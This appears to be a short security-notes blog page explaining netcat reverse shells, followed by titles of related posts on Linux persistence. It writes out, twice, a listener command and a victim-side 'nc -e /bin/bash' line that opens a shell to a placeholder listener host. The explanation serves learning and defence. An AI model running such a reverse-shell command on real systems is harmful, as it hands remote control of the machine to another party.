Netcat is commonly used by attackers and testers to establish reverse shells when command execution is established.
Example:
Attacker:
nc -lnlvp 4444
Victim:
nc -e /bin/bash LISTENER_IP 4444
netcat reverse shells
0001-01-01
Netcat is commonly used by attackers and testers to establish reverse shells when command execution is established.
Example:
Attacker:
nc -lnlvp 4444
Victim:
nc -e /bin/bash LISTENER_IP 4444
Linux Persistence: Startup Scripts
2024-11-10 DFIR CTF linux persistence systemd SysV init startup script
Linux Persistence: Cron
2024-11-10 DFIR CTF linux persistence cron
Linux Persistence: User Accounts
2021-06-27 DFIR linux persistence